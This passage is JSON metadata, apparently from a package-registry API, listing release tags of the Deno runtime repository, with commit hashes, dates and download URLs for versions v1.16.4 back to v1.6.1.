1.16.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.4/manifests"},{"name":"v1.16.3","sha":"bfa2f30529921155551e8b288bcda1e01c468b79","kind":"tag","published_at":"2021-11-24T23:06:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.3/manifests"},{"name":"v1.16.2","sha":"4836ab769c00c83b7c5488c4d9c5f185be858e70","kind":"commit","published_at":"2021-11-17T16:00:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.2/manifests"},{"name":"v1.16.1","sha":"fdf890a68d3d54d40c766fd78faeccb20bd2e2c6","kind":"commit","published_at":"2021-11-11T10:59:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.1/manifests"},{"name":"v1.16.0","sha":"1eae6c139ee1dac28df57d67d993792b773fa1ff","kind":"commit","published_at":"2021-11-09T12:55:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.0/manifests"},{"name":"v1.15.3","sha":"f32f458318819088d59f58b7a4c05f0d28e41dff","kind":"commit","published_at":"2021-10-25T11:11:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.3/manifests"},{"name":"v1.15.2","sha":"71da8140737a0ee81dd324e1156fd920a790c1cb","kind":"commit","published_at":"2021-10-18T19:01:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.2/manifests"},{"name":"v1.15.1","sha":"b1d63aefd9f150ed3acbc3d0a6c2f51dadad3d17","kind":"commit","published_at":"2021-10-13T07:48:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.1/manifests"},{"name":"v1.15.0","sha":"de3fa08d6cfac7edffb2411bbb42bb49af70dc82","kind":"commit","published_at":"2021-10-12T17:57:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.0/manifests"},{"name":"v1.14.3","sha":"1b7d6809f649318a0fb6f0e241c25885538bbe25","kind":"commit","published_at":"2021-10-04T22:03:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.3/manifests"},{"name":"v1.14.2","sha":"3ab682918a7cb9e23f8451eedb88074766d27049","kind":"commit","published_at":"2021-09-28T12:00:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.2/manifests"},{"name":"v1.14.1","sha":"f27902e749fb3a78ca35a0dc41c9fc53cd2806e1","kind":"commit","published_at":"2021-09-21T22:44:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.1/manifests"},{"name":"v1.14.0","sha":"f92cc66f0dbf8e9753f2e98d4469190f3b561eb0","kind":"commit","published_at":"2021-09-14T20:46:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.0/manifests"},{"name":"v1.13.2","sha":"7b882cc05f02e9b09e9ec2856e37730ae947f509","kind":"commit","published_at":"2021-08-23T20:58:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.2/manifests"},{"name":"v1.13.1","sha":"c67f6c13cd1de22e32f81723bc9224b8e2103a7a","kind":"commit","published_at":"2021-08-16T21:42:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.1/manifests"},{"name":"v1.13.0","sha":"d82351d67784a2bcb5431ebb233abc727f673152","kind":"commit","published_at":"2021-08-10T14:22:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.0/manifests"},{"name":"v1.12.2","sha":"dfba7a2b0197b05b3cb61724096111cc618aa747","kind":"commit","published_at":"2021-07-26T14:38:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.2/manifests"},{"name":"v1.12.1","sha":"7d69f06db88cf022f2c5c6e0b04493af7b50a98b","kind":"commit","published_at":"2021-07-19T19:09:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.1/manifests"},{"name":"v1.12.0","sha":"1ad6575028bd5a13eb0633cc5e7649e18deec556","kind":"commit","published_at":"2021-07-13T08:45:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.0/manifests"},{"name":"v1.11.5","sha":"1e57081906fd2c504c0e4895681bdc7386c1956f","kind":"commit","published_at":"2021-07-02T15:51:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.5/manifests"},{"name":"v1.11.4","sha":"ed16f4332263e81bf00a39ebc2200291b1fcbb8e","kind":"commit","published_at":"2021-07-01T11:57:51.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.4/manifests"},{"name":"v1.11.3","sha":"f4bed1081456089559c82441a13c4fb700840cac","kind":"commit","published_at":"2021-06-29T16:43:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.3/manifests"},{"name":"v1.11.2","sha":"2c0e482221cd86fdbdc055c76f1c214200419946","kind":"commit","published_at":"2021-06-21T15:47:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.2/manifests"},{"name":"v1.11.1","sha":"d7ce3adc8b97ebca61c1f527ea0f9b842d0a2dbe","kind":"commit","published_at":"2021-06-15T21:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.1/manifests"},{"name":"v1.11.0","sha":"b98293e21cb7e55def8fea2ca015381150d4cebf","kind":"commit","published_at":"2021-06-08T19:38:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.0/manifests"},{"name":"v1.10.3","sha":"1567c1013cc8ff12cf039137792da66a1d0015b5","kind":"tag","published_at":"2021-05-31T20:22:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.3/manifests"},{"name":"v1.10.2","sha":"232ec7798c5ee38e645c2aea31aea3e9a81e17f3","kind":"commit","published_at":"2021-05-17T15:28:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.2/manifests"},{"name":"v1.10.1","sha":"1cd1419e18386d512ab98849d132117182545b89","kind":"commit","published_at":"2021-05-12T03:11:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.1/manifests"},{"name":"v1.10.0","sha":"57927781ed7eb8bb088d656768dc295716407c7a","kind":"commit","published_at":"2021-05-12T00:06:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.0/manifests"},{"name":"v1.9.2","sha":"8074d8bcf3cdcc7e9a08df147e0082798a7c2760","kind":"commit","published_at":"2021-04-23T14:08:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.2/manifests"},{"name":"v1.9.1","sha":"7760d9a669552e69211b101d4656662a3dddf8dd","kind":"commit","published_at":"2021-04-20T23:46:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.1/manifests"},{"name":"v1.9.0","sha":"262ee78592209a1f8e449cfa1308dca9688a414e","kind":"commit","published_at":"2021-04-13T18:11:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.0/manifests"},{"name":"v1.8.3","sha":"2e6b78be9095cc38c392e2477711ff6eec226704","kind":"commit","published_at":"2021-04-02T10:10:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.3/manifests"},{"name":"v1.8.2","sha":"f50ed4e281e6c30120412271eb66a1fb67d1c63e","kind":"commit","published_at":"2021-03-21T20:12:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.2/manifests"},{"name":"v1.8.1","sha":"8d3baa7777b6bd2a2631e1b87a4676b520f2b447","kind":"commit","published_at":"2021-03-09T20:55:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.1/manifests"},{"name":"v1.8.0","sha":"18b894072d3eb6b04016e77ece0d78512f7ffca1","kind":"commit","published_at":"2021-03-02T23:23:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.0/manifests"},{"name":"v1.7.5","sha":"e9669bf0656c2478416f6705ff218539dc42c126","kind":"commit","published_at":"2021-02-19T14:58:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.5/manifests"},{"name":"v1.7.4","sha":"d2d7dc8d675d70f0061bdaf99ae4a08d84156aa9","kind":"commit","published_at":"2021-02-13T13:20:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.4/manifests"},{"name":"v1.7.3","sha":"f67b06939be5b754ecee306e9da1d7c0779c3cd6","kind":"commit","published_at":"2021-02-12T16:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.3/manifests"},{"name":"v1.7.2","sha":"647f11b3acc2f629a6d77836f5f6ef74ee10c4ce","kind":"commit","published_at":"2021-02-05T19:33:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.2/manifests"},{"name":"v1.7.1","sha":"11dd6f201378fe04cccadb46b7054cc2f791dda8","kind":"commit","published_at":"2021-01-29T14:53:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.1/manifests"},{"name":"std/0.85.0","sha":"11dd6f201378fe04cccadb46b7054cc2f791dda8","kind":"commit","published_at":"2021-01-29T14:53:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.85.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.85.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.85.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.85.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.85.0/manifests"},{"name":"v1.7.0","sha":"0f7a02500c0abdaae4ecfa89259c026c624773a9","kind":"commit","published_at":"2021-01-20T05:24:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.0/manifests"},{"name":"std/0.84.0","sha":"0f7a02500c0abdaae4ecfa89259c026c624773a9","kind":"commit","published_at":"2021-01-20T05:24:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.84.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.84.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.84.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.84.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.84.0/manifests"},{"name":"v1.6.3","sha":"b07a0b640d01d87c926a74d42e26a6561848c7c5","kind":"commit","published_at":"2020-12-30T15:13:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.3/manifests"},{"name":"std/0.83.0","sha":"b07a0b640d01d87c926a74d42e26a6561848c7c5","kind":"commit","published_at":"2020-12-30T15:13:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.83.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.83.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.83.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.83.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.83.0/manifests"},{"name":"v1.6.2","sha":"d199e45ad5dd180a6969abcd528023e173a1e1ff","kind":"commit","published_at":"2020-12-22T16:00:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.2/manifests"},{"name":"std/0.82.0","sha":"d199e45ad5dd180a6969abcd528023e173a1e1ff","kind":"commit","published_at":"2020-12-22T16:00:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.82.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.82.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.82.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.82.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.82.0/manifests"},{"name":"v1.6.1","sha":"b6d5ae1ecd125ce8a14cddc877cb66dbcfc9bb04","kind":"commit","published_at":"2020-12-14T20:25:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.1","dependencies_